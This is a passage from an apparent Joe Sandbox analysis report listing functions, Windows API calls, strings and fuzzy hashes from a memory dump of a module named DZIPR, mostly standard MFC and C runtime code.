Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: H_prolog3$Exception@8Throw
String ID:
API String ID: 2489616738-0
Opcode ID: f840cdaf80a800fb6fd92509b49d44779c7f38f306811b54306dee07a0d0e0af
Instruction ID: 6cd78edf0468d844fea81680e85e46f0c1bbb4e1f0a9d0da46e6716e37328a3d
Opcode Fuzzy Hash: f840cdaf80a800fb6fd92509b49d44779c7f38f306811b54306dee07a0d0e0af
Instruction Fuzzy Hash: E3019A7070821ACBDB18BE3188222AD36B6BB60359F20853CE4928BF90DF31C945CB50

Function 6C9160F0 Relevance: 1.5, APIs: 1, Instructions: 33
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000004,00000080,00000000), ref: 6C9160F6

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 476ac34504fe3e55848c2e8a40cde727e4a0e75d46a5d5603e28f92b026bb9f7
Instruction ID: 8f239047dc673db5e911d9811fd1d75466b9c57eded723db0efcee373925f455
Opcode Fuzzy Hash: 476ac34504fe3e55848c2e8a40cde727e4a0e75d46a5d5603e28f92b026bb9f7
Instruction Fuzzy Hash: 3601E8B0A083019FC718DF0AC89090ABBF6FFC9308F26856DA84897316C630E851CF85

Function 6C92A6F4 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,?,6C924776,00000001,?,?,?,6C9248EF,?,?,?,6C93E848,0000000C,6C9249AA), ref: 6C92A709

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 27a1119d218eab925c179ff2741093de0818835a91f0851e17aba456b5c97ea3
Instruction ID: 6c84610712efbd296c0bbc9f0e98e30d22176dec80e0afc253ff6e8a5060960d
Opcode Fuzzy Hash: 27a1119d218eab925c179ff2741093de0818835a91f0851e17aba456b5c97ea3
Instruction Fuzzy Hash: 8CD05E36B583449ADB14AEB15C48B663BFC938579AF248836F84CCA180E674C5809A48

Non-executed Functions

Function 6C91748E Relevance: 12.1, APIs: 8, Instructions: 126filestringCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6C917498
GetFullPathNameW.KERNEL32(00000000,00000104,00000000,?,00000268,6C9176D5,?,00000000,?,00000000,00000104,00000000,?,6C93BEF4,00000000), ref: 6C9174D6

Part of subcall function 6C916DC1: __CxxThrowException@8.LIBCMT ref: 6C916DD7
Part of subcall function 6C916DC1: __EH_prolog3.LIBCMT ref: 6C916DE4

PathIsUNCW.SHLWAPI(?,00000000,?), ref: 6C917546
GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 6C91756D
CharUpperW.USER32(00000000), ref: 6C9175A0
FindFirstFileW.KERNEL32(?,?), ref: 6C9175BC
FindClose.KERNEL32(00000000), ref: 6C9175C8
lstrlenW.KERNEL32(?), ref: 6C9175E6

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3H_prolog3_InformationNameThrowUpperVolumelstrlen
String ID:
API String ID: 624941980-0
Opcode ID: 708044b7188cd0276dfec8e0330bbdd239b37ee7fa9c92f150b7767edc43bd3a
Instruction ID: c53d36f0d339bba54ab4f77ca2674a39815092a41e12e0e1e5454237a83ce710
Opcode Fuzzy Hash: 708044b7188cd0276dfec8e0330bbdd239b37ee7fa9c92f150b7767edc43bd3a
Instruction Fuzzy Hash: 3041A47090D21EABDF249F65CC4EBAE7A7DAF21358F100699E819D1D91DB35CA84CF10

Function 6C923F34 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 6C927C6C
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6C927C81
UnhandledExceptionFilter.KERNEL32(6C93A4B8), ref: 6C927C8C
GetCurrentProcess.KERNEL32(C0000409), ref: 6C927CA8
TerminateProcess.KERNEL32(00000000), ref: 6C927CAF

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 5660b1a329e0c98a21de5daee40f1b4326207978a3a699744cfe3648618e05a8
Instruction ID: 8d0747f88b5f67c12154be27b5538289adaa1377cf0f6869b37746e7b071f681
Opcode Fuzzy Hash: 5660b1a329e0c98a21de5daee40f1b4326207978a3a699744cfe3648618e05a8
Instruction Fuzzy Hash: F121FEB471A284DFDB41EFA5C4896883BB8BB0A309F70811BE5089B350E7749984CF45

Function 6C9189B5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000800,00000003,?,00000004), ref: 6C9189FC
__snwprintf_s.LIBCMT ref: 6C918A2E
LoadLibraryW.KERNEL32(?), ref: 6C918A69

Part of subcall function 6C925348: __getptd_noexit.LIBCMT ref: 6C925348

Strings

LOC, xrefs: 6C9189DC

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: InfoLibraryLoadLocale__getptd_noexit__snwprintf_s
String ID: LOC
API String ID: 3175857669-519433814
Opcode ID: 6893485b9128813e3efa96b115b480adcda545be4971cde43ddc56eb14f7e2b7
Instruction ID: 9338c27f7f73f6fe92bb52f7f99a5969db8d8815b983e502ecbfabdffffeceee
Opcode Fuzzy Hash: 6893485b9128813e3efa96b115b480adcda545be4971cde43ddc56eb14f7e2b7
Instruction Fuzzy Hash: B6110A71A5830CABDB14AB74CC86BED77FCAB21368F110062A114A7D84DB74DE08D764

Function 6C9204EE Relevance: 6.0, APIs: 4, Instructions: 42keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyState.USER32(00000010), ref: 6C920514
GetKeyState.USER32(00000011), ref: 6C92051D
GetKeyState.USER32(00000012), ref: 6C920526
SendMessageW.USER32(?,00000111,0000E146,00000000), ref: 6C92053C

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: State$MessageSend
String ID:
API String ID: 1440529007-0
Opcode ID: efb0529bf158321d02e74b0f1dad38a9be85d853676aea2a731a1b408a261589
Instruction ID: ebd89bc1abc5bc23133cbff1f2475e204ad92792038d87c124d06468efe2a3ff
Opcode Fuzzy Hash: efb0529bf158321d02e74b0f1dad38a9be85d853676aea2a731a1b408a261589
Instruction Fuzzy Hash: B6F0E9367B93CFA6EB1429764C51FF909388FB1BD4F10107266C9EA9C8CFA4C40A4670

Function 6C918BDF Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 159libraryloaderCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6C918BE9
GetModuleHandleW.KERNEL32(kernel32.dll,00000260,6C918EB7,?,?), ref: 6C918C19
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 6C918C2D
ConvertDefaultLocale.KERNEL32(?), ref: 6C918C69
ConvertDefaultLocale.KERNEL32(?), ref: 6C918C77
GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 6C918C94
ConvertDefaultLocale.KERNEL32(?), ref: 6C918CBF
ConvertDefaultLocale.KERNEL32(000003FF), ref: 6C918CC8
GetModuleHandleW.KERNEL32(ntdll.dll), ref: 6C918CE1
EnumResourceLanguagesW.KERNEL32(00000000,00000010,00000001,Function_000084C0,?), ref: 6C918CFE
ConvertDefaultLocale.KERNEL32(?), ref: 6C918D31
ConvertDefaultLocale.KERNEL32(00000000), ref: 6C918D3A
GetModuleFileNameW.KERNEL32(6C910000,?,00000105), ref: 6C918D7F
_memset.LIBCMT ref: 6C918D9F

Strings

GetUserDefaultUILanguage, xrefs: 6C918C21
kernel32.dll, xrefs: 6C918C02
GetSystemDefaultUILanguage, xrefs: 6C918C79
ntdll.dll, xrefs: 6C918CDC

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressHandleProc$EnumFileH_prolog3_LanguagesNameResource_memset
String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
API String ID: 3537336938-2299501126
Opcode ID: 790ec55e42e6ba09a2f8f9f2787d9345db8f7f4d9c9afe4e9d2e100328b6258b
Instruction ID: 04083849c69bd5a34a06dc71fa30b5b26ff747efcb26e893eca72a9a5c84d181
Opcode Fuzzy Hash: 790ec55e42e6ba09a2f8f9f2787d9345db8f7f4d9c9afe4e9d2e100328b6258b
Instruction Fuzzy Hash: 3F516C70D152389ACB64EFA59C897ADB6F8EF68304F1101DBA448E3680D778CE81DF58

Function 6C91DCCE Relevance: 29.8, APIs: 8, Strings: 9, Instructions: 82libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(USER32,00000000,00000000,75A44A40,6C91DE36,?,?,?,?,?,?,?,6C91FCC6,00000000,00000002,00000028), ref: 6C91DCF9
GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 6C91DD15
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C91DD2A
GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 6C91DD3B
GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 6C91DD4C
GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 6C91DD5D
GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesW), ref: 6C91DD6E
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 6C91DD8E

Strings

EnumDisplayDevicesW, xrefs: 6C91DD68
MonitorFromPoint, xrefs: 6C91DD46
EnumDisplayMonitors, xrefs: 6C91DD57
MonitorFromRect, xrefs: 6C91DD35
GetSystemMetrics, xrefs: 6C91DD0F
GetMonitorInfoW, xrefs: 6C91DD81
MonitorFromWindow, xrefs: 6C91DD24
GetMonitorInfoA, xrefs: 6C91DD88
USER32, xrefs: 6C91DCEF

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetMonitorInfoA$GetMonitorInfoW$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
API String ID: 667068680-2451437823
Opcode ID: a573d466044bbedce04d2fcaf2187e306f62e02b4d98f61b436ea41dab1dd951
Instruction ID: 124e91747d30c9ae9da48860d8b021a25836ab21b0376b6540e3d6ab1604c1fa
Opcode Fuzzy Hash: a573d466044bbedce04d2fcaf2187e306f62e02b4d98f61b436ea41dab1dd951
Instruction Fuzzy Hash: 9A216D72A2D1B59F9F03BF6488C952A7AF8B78B20D371DA7FD109E2E04D77080508E11

Function 6C91FBD6 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 175windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 6C91FC05
SendMessageW.USER32(00000000,0000036B,00000000,00000000), ref: 6C91FC28
GetWindowRect.USER32(?,?), ref: 6C91FC42
CopyRect.USER32(?,?), ref: 6C91FCA5
CopyRect.USER32(?,?), ref: 6C91FCAF
GetWindowRect.USER32(00000000,?), ref: 6C91FCB8

Part of subcall function 6C91DE96: MultiByteToWideChar.KERNEL32(00000000,00000000,00000028,000000FF,00000028,00000020), ref: 6C91DED6

CopyRect.USER32(?,?), ref: 6C91FCD4

Strings

(, xrefs: 6C91FC6E

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: Rect$Copy$Window$ByteCharMessageMultiParentSendWide
String ID: (
API String ID: 2332539329-3887548279
Opcode ID: cdddf5b949ce22746539d7f4894fe18d8be65235405324b6356fcae9f7d9cc05
Instruction ID: 805b1bc5ba340a7feb235fbbfa4e2f923b4c3bdc8ace38d1738652e27aab784f
Opcode Fuzzy Hash: cdddf5b949ce22746539d7f4894fe18d8be65235405324b6356fcae9f7d9cc05
Instruction Fuzzy Hash: C4519072A0861DABDB01CBA8CD85AEEBBBDAF48358F150116F905F7A40DB30E905CB54

Function 6C9219AE Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 153COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6C9219B8

Part of subcall function 6C91C050: __EH_prolog3.LIBCMT ref: 6C91C057

CallNextHookEx.USER32(?,?,?,?), ref: 6C9219F8

Part of subcall function 6C916DC1: __CxxThrowException@8.LIBCMT ref: 6C916DD7
Part of subcall function 6C916DC1: __EH_prolog3.LIBCMT ref: 6C916DE4

_memset.LIBCMT ref: 6C921A51
GetClassLongW.USER32(?,000000E0), ref: 6C921A85
GetClassNameW.USER32(?,?,00000100), ref: 6C921B20
GetPropW.USER32(?,AfxOldWndProc423), ref: 6C921B5D
SetPropW.USER32(?,AfxOldWndProc423,?), ref: 6C921B6F
GetPropW.USER32(?,AfxOldWndProc423), ref: 6C921B77
GlobalAddAtomW.KERNEL32(AfxOldWndProc423), ref: 6C921B86
CallNextHookEx.USER32(?,00000003,?,?), ref: 6C921BA6
UnhookWindowsHookEx.USER32(?), ref: 6C921BBA

Strings

#32768, xrefs: 6C921A63, 6C921A68, 6C921B36
AfxOldWndProc423, xrefs: 6C921B56, 6C921B5B, 6C921B6D, 6C921B75, 6C921B85

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: HookProp$CallClassH_prolog3Next$AtomException@8GlobalH_prolog3_LongNameThrowUnhookWindows_memset
String ID: #32768$AfxOldWndProc423
API String ID: 3902210324-2141921550
Opcode ID: c57b9782da692f81ddac9a12d1f7e4a686824b3c7ff4239fb3ffa1ce536195ee
Instruction ID: 6cbaeb622983bb575eee20eb9218c8dbd3168d80c6a7230ef6a2af5548cc670c
Opcode Fuzzy Hash: c57b9782da692f81ddac9a12d1f7e4a686824b3c7ff4239fb3ffa1ce536195ee
Instruction Fuzzy Hash: 72510831514229ABCF219F60CC48BEA7BB8BF16355F100185F44DE6A94DB39CE94CFA4

Function 6C92A11F Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,6C93E928,0000000C,6C92A25A,00000000,00000000,?,6C92A5D4,00000000,00000001,00000000,?,6C92A89E,00000018,6C93E978,0000000C), ref: 6C92A131
__crt_waiting_on_module_handle.LIBCMT ref: 6C92A13C

Part of subcall function 6C925BCF: Sleep.KERNEL32(000003E8,00000000,?,6C92A082,KERNEL32.DLL,?,?,6C92A416,00000000,?,6C92488C,00000000,?,?,?,6C9248EF), ref: 6C925BDB
Part of subcall function 6C925BCF: GetModuleHandleW.KERNEL32(00000000,?,6C92A082,KERNEL32.DLL,?,?,6C92A416,00000000,?,6C92488C,00000000,?,?,?,6C9248EF,?), ref: 6C925BE4

GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 6C92A165
GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 6C92A175
__lock.LIBCMT ref: 6C92A197
InterlockedIncrement.KERNEL32(?), ref: 6C92A1A4
__lock.LIBCMT ref: 6C92A1B8
___addlocaleref.LIBCMT ref: 6C92A1D6

Strings

KERNEL32.DLL, xrefs: 6C92A12B, 6C92A130, 6C92A13B
EncodePointer, xrefs: 6C92A159
DecodePointer, xrefs: 6C92A16D

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1028249917-2843748187
Opcode ID: 290fe6c3fa95b4611c9613622d422096788ce400adce5abb5836bf1c0bd57b97
Instruction ID: b59040ac651f5111cb1356b1c2f4722acf7c89ce08e0a556210c1397d2ba4f54
Opcode Fuzzy Hash: 290fe6c3fa95b4611c9613622d422096788ce400adce5abb5836bf1c0bd57b97
Instruction Fuzzy Hash: A711D5714047019FDB209F758804B9ABBF0AF65328F10950AD4D9D3B90CF78EA44DF64

Function 6C9184DA Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 60libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32), ref: 6C918503
GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6C918520
GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 6C91852D
GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 6C91853A
GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 6C918547

Strings

ActivateActCtx, xrefs: 6C91852F
CreateActCtxW, xrefs: 6C91851A
DeactivateActCtx, xrefs: 6C91853C
KERNEL32, xrefs: 6C9184FE
ReleaseActCtx, xrefs: 6C918522

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
API String ID: 667068680-2424895508
Opcode ID: ff6b6614069009198cfe098f9e0b9a96d7d26a2beb5ffae84dc7fb8fccfed8ca
Instruction ID: 7c31658846cd99d8d14d59245ec71da8af514c875bec3208d7eb35f6e8254c41
Opcode Fuzzy Hash: ff6b6614069009198cfe098f9e0b9a96d7d26a2beb5ffae84dc7fb8fccfed8ca
Instruction Fuzzy Hash: 7D1121B1A1D295AF8B18BFB6888A416BFB8EB4735CB25857FE109C3900E730C540DA19

Function 6C91A59C Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 28libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32,6C91A6B6), ref: 6C91A5AA
GetProcAddress.KERNEL32(00000000,CreateActCtxW), ref: 6C91A5CB
GetProcAddress.KERNEL32(ReleaseActCtx), ref: 6C91A5DD
GetProcAddress.KERNEL32(ActivateActCtx), ref: 6C91A5EF
GetProcAddress.KERNEL32(DeactivateActCtx), ref: 6C91A601

Part of subcall function 6C916DC1: __CxxThrowException@8.LIBCMT ref: 6C916DD7
Part of subcall function 6C916DC1: __EH_prolog3.LIBCMT ref: 6C916DE4

Strings

ActivateActCtx, xrefs: 6C91A5DF
CreateActCtxW, xrefs: 6C91A5C5
DeactivateActCtx, xrefs: 6C91A5F1
KERNEL32, xrefs: 6C91A5A5
ReleaseActCtx, xrefs: 6C91A5CD

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: AddressProc$Exception@8H_prolog3HandleModuleThrow
String ID: ActivateActCtx$CreateActCtxW$DeactivateActCtx$KERNEL32$ReleaseActCtx
API String ID: 417325364-2424895508
Opcode ID: 443ae36f18e3cf1335a236a3540198048e9fbad8884d0a6075a54815f3f970d8
Instruction ID: ff02b53af6e1599733f4e6d13d528281a7a1ce1bb647a5f8bfbae46fe161df51
Opcode Fuzzy Hash: 443ae36f18e3cf1335a236a3540198048e9fbad8884d0a6075a54815f3f970d8
Instruction Fuzzy Hash: 96F0D4B4A1D2B5ABCF44BFB288089167EB8B74625CF20991BA818D3A00DB70C108CF49

Function 6C91C8E2 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 128COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 6C91C91F
PathFindExtensionW.SHLWAPI(?), ref: 6C91C939
__wcsdup.LIBCMT ref: 6C91C983
__wcsdup.LIBCMT ref: 6C91C9C2
__wcsdup.LIBCMT ref: 6C91CA14
__wcsdup.LIBCMT ref: 6C91CA55

Strings

.INI, xrefs: 6C91CA36
.HLP, xrefs: 6C91C9F9
.CHM, xrefs: 6C91C9F2

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: __wcsdup$ExtensionFileFindModuleNamePath
String ID: .CHM$.HLP$.INI
API String ID: 2477486372-4017452060
Opcode ID: cccc0fa5d3bad4e19ab7a83f23dbfcbc2eba645aeb77bb898c9af6ebb2b279e0
Instruction ID: 8793ccd7e64e19cecb13fe6f3db50989df84ad1f3ea40e117a1edc7c134afb89
Opcode Fuzzy Hash: cccc0fa5d3bad4e19ab7a83f23dbfcbc2eba645aeb77bb898c9af6ebb2b279e0
Instruction Fuzzy Hash: DC419EB1A0861D9BDB20EB75CC45BCAB3FCAF54308F1009BA954AD7E40EB30D948CB64

Function 6C911C00 Relevance: 13.7, APIs: 9, Instructions: 159fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,?,?,00000000,?,?,?,?,?,6C911BE9,?,?,?,?), ref: 6C911C39
GetLastError.KERNEL32(?,?,?,?,?,6C911BE9,?,?,?,?), ref: 6C911C48
__aullrem.LIBCMT ref: 6C911C60
ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,00000000), ref: 6C911CE8
_memset.LIBCMT ref: 6C911CF5
SetFilePointer.KERNEL32(?,?,00000000,00000001,?,?,?,?,6C911BE9,?,?,?,?), ref: 6C911D07

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

